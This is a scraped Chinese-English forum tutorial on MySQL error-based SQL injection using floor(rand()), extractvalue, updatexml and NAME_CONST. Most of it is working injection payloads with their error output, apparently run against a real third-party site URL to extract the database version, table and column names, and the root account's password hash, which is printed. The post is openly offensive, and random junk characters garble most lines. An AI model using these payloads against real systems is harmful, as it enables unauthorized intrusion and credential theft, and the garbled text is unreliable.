1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
% ? I8 @5 ?! v首先进行正常查询: mysql> select * from article where id = 1;/ j, U+ C; F0 K- [' X; r& X& i
+—-+——-+———+. S/ j9 P/ d+ I# D* K5 i
| id | title | content |/ d+ P Q- @% ]' ?0 c, e
+—-+——-+———+
# C9 `( u: l/ A; N, g) w2 Y* x| 1 | test | do it |, b( L @& ~( z, _; G
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);7 Y- U* |2 p" _6 V
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
5 f' @# f( p* U! S5 i' I0 ]6 ^" B例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);5 f* d E; Z6 [" ]
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));& |3 R3 G6 ~2 b
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue7 P6 u/ C1 [+ s# h1 S4 h/ t
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
, \3 |% c4 G& @* J# EERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
9 O4 h4 M' f9 [8 W1 w' K+ F) k) V. o& q
再收集:
/ C. P3 E) p1 k. v8 ?( g7 s3 ahttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) # L! y$ Z6 A2 I4 E
! @7 L8 ~5 {* b. C) M$ fErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’( W6 z% H1 E# Y* P5 o
- c2 J8 a% B% P' u: c2 nhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)4 i7 G. N1 Z: q1 _
: \; t; V: p# g2 \% n% X2 ZErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
+ I( D' |: @& X/ V" b8 p: l9 s1 Z9 w5 f; F
MYSQL高版本报错注入技巧-利用NAME_CONST注入
& ?& ]% ~1 r2 T0 l: O- [4 l8 g1 IIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 8 p8 Z S5 S( G1 X! d1 L
( `( k0 O) g4 a( R
. O" b3 ?: l# ]3 N, O4 L" c. K相关信息1 ^0 x+ J: e& N9 m0 V4 D
/ {9 K1 { e* R+ m0 }NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that., r1 x) Y0 [ `7 n* k; K
$ X! l$ K R* k' S3 dCode:
, k5 A- v! F: \; JNAME_CONST(DATA, VALUE). N9 I# }- O1 J! Y4 Q
* i. l$ w5 ^' Q' e, l
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
; x2 N1 Q+ G, `7 D- j. `2 j4 o: {4 d% J
SELECT NAME_CONST('TEST', 1)
$ [+ z# v/ L# p+ t+ y8 [6 Q( p9 ^8 h3 o
* m* w0 x2 F$ ~& C5 P# @
3 @+ y* n Q3 `1 f# L|---------------|$ Q: P6 \2 @* b" G8 Q
| TEST |
9 p9 ^1 C5 p: s' s0 v| |
! z% H1 ^: o$ n ]* u2 r/ @1 x|---------------|! w6 F. S$ D, v/ [
| 1 | X/ j+ y, k* S( ~# R( c
| |
4 @, D3 [( Y3 @|---------------|; G$ F( S5 I) g; I6 S/ B, {; g# j: R
' M P8 u# L' f
% k, i; w% M" o- I$ [4 e$ K* l+ d4 x% }
$ I2 f% M' m6 ]- [: S2 uhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
% e. H" h9 H5 Z1 G$ NIntro to MySQL Variables
+ N/ x" g9 q0 S7 b+ S3 B& t# u" S
5 }: ?9 z$ U; ?5 t! O( z/ b( W2 q* BOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
x5 G7 k6 a! g
0 l l* s r/ S$ |Code:; {1 I" W2 D' a' c( k5 f$ F
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
* S }5 h! u& b' k1 M5 K
# G+ y" K* ^! y3 l" s: b- r" F, \# d* I$ d! T P1 A+ W' G
. U3 t p1 l9 U1 `4 U! A( j
4 ]" w* U2 ~, t( P, \9 t
4 t0 `, _$ x6 ?" UCode:
* }# R2 @& l* t, Kand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
+ a- |5 @9 W; f% d9 [% ?5 H1 t
9 ^2 F" c) ~7 k
5 a7 U- M" ?2 F3 ^VAR = Your MySQL variable.
$ v/ t5 }7 u, M5 d* f# N; L _
# N: K* v% A4 `# R5 HMySQL 5.1.3 Server System Variables8 l# X# {5 X; @6 @5 J& d9 J. W. y+ H
+ b% l, I% c3 _: A( x: V8 a8 @Let's try it out on my site..
# q. Y4 M) y; Q9 S/ ?: @3 h* o
" Z0 _) v+ ^5 @/ _Code:
/ V! v3 ~5 g( F7 A; ~http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
8 S% u4 `3 U7 b2 I: @. Q) e- a. U7 `4 |
Erroruplicate column name '5.0.27-community-nt'
% Q" W" I* J& y7 m4 N- w* f4 P
4 D* }9 |1 [+ P5 ?+ ?4 {
- R" z4 ^. `% x. s7 v- _/ T; a. P) L# q& O
/ ]' _( {% |8 h, ] t
; x$ t& T2 `$ G- w" w
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
2 r* H2 `9 ~' `3 ]! A
, ?: Z2 s9 l5 J4 p* N% S3 E: l& ~# tData Extraction& g0 g- m% O. c( b6 @" f' @
' i, m" l$ {2 z& M. z# L
Code:
* v8 R0 w$ `0 W& V; y/ ~$ Q, o/ R+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
$ o8 v1 A5 d" m& Z9 E7 X7 t0 u6 G- S9 Z& M) p. m4 K8 i% g: Y
$ a+ n% d1 A6 Y0 @; D: y/ T% N# O3 dWe should get a duplicate column 1 error...
( G$ u; d$ _& c2 a
9 P" a* p0 ]2 dCode:$ r4 G1 h0 u& ^/ y+ t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
- Y( k0 J& R( O' c) _* v3 {4 C
$ j! x f& y% V1 g! MErroruplicate column name '1
. ] w. M9 K- M, N4 v! G8 i, Z" M% S- J/ p& C
' }( b/ `& ]8 e, o0 U: Y
3 V( i2 g3 J9 l0 K* _
% E' Q2 m% c" G; y( R6 Y4 V9 C5 g: J2 U
$ J5 O5 R. x6 J+ X- LNow let's get the tables out this bitch..
7 W2 H& e* v: R3 Y- L& i, [3 S: H6 f% Y2 u9 Z7 G
Code:0 W* w K1 V) R9 }. E0 ^
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
% V; g. _3 K) ]
# h( r/ g( e( l$ N* ]1 c
2 c% o+ O* ]3 ?- `9 B. ?5 aLet's see if it works here, if it does, we can go on and finish the job.( N6 t3 ?; N# i- L
/ B. y l/ C; W' |4 ~" VCode:
) S# w( J; Y* O; D0 s% G! `8 ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--! X B) I ], q% o# k( I
4 _' B- e& O* R$ B V, ^
7 ~ I. m0 b5 H: J/ @" W* kErroruplicate column name 'com_admanage
& p- W9 [* c* k! w7 j& }3 R- Z# y1 H3 |2 W6 D: U0 \
' @" B/ }/ T0 \5 ^
% k& w0 X% I- F2 ~6 C0 `! I1 g6 e" l$ d2 i9 {* e! a; j
% a$ N% p. T% F3 c% G+ ~
1 C8 |( {- w" j! f& d; C7 UNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
+ e1 I$ Q& U8 r/ p$ o& |0 {! s. n6 o% K3 a' e. w. e4 E% O
Let's get the columns out of the user table.." `* L9 Z/ Y% |6 B) D
8 `9 y! ?) o: t5 v
Code:
5 ^6 A+ Y/ Y t( @3 K: M5 p& q+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--: R+ K6 y+ f$ s4 |: g. V9 n( K
& e' X) M! K7 V+ j
; z8 r3 k: A2 X& B+ {& Y( |So mine looks like this, and I get the duplicate column name 'Host'.# f9 J/ O5 x m+ |2 s
4 D; C2 R. h* r2 l. wCode:3 t" |' }; J; Q
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)-- ?$ e7 @0 I0 w
, p% f# C, l8 _Erroruplicate column name 'Host'9 k( I( {$ l; s, L, O# ?
G; N% h. i x: m. ^4 i2 k
. C) w; A- o; ]6 T
' z% ~: K4 k0 l/ O0 s5 \4 D9 |" u1 g7 `9 b, Y: C
' G0 ~4 Q1 y* }" r$ r
! w. ], d. O& H; uWoot, time to finish this bitch off.
; y/ B! Z# c" ~
* h; g: A& E; H8 GCode:9 {- O! t, o6 S/ ?- r/ ?
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 K3 t+ Y/ L2 P" Q3 I. v) T
! l2 G& h X* b9 a1 t. a
8 H' G1 O& v) N. Y0 T# ?So mine looks like this...
' U' r' r8 D/ ?8 y6 G6 m8 s5 Y( c) ~6 y3 l; C) C& ~
Code:
' s: O- b$ a" a6 P4 E `http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--3 {" q: Z: y; j9 Q+ B
5 W' @4 B( ~8 R: C7 {# i" lErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82': Z" ?) @! l3 R+ K3 i: Q
/ M; v+ G3 O4 I- w: v N* K" s6 F8 Y
+ ^/ ~' u& J- a5 g1 M1 |
) x3 E) m; e* M4 _
' R4 w5 m# g9 K$ R8 m' O: V% I( [$ G+ [8 O
And there we have it, thanks for reading.
. |" M0 G6 J4 C# w" L( a3 F6 a& R& N! k# f# b$ ~0 X" N
|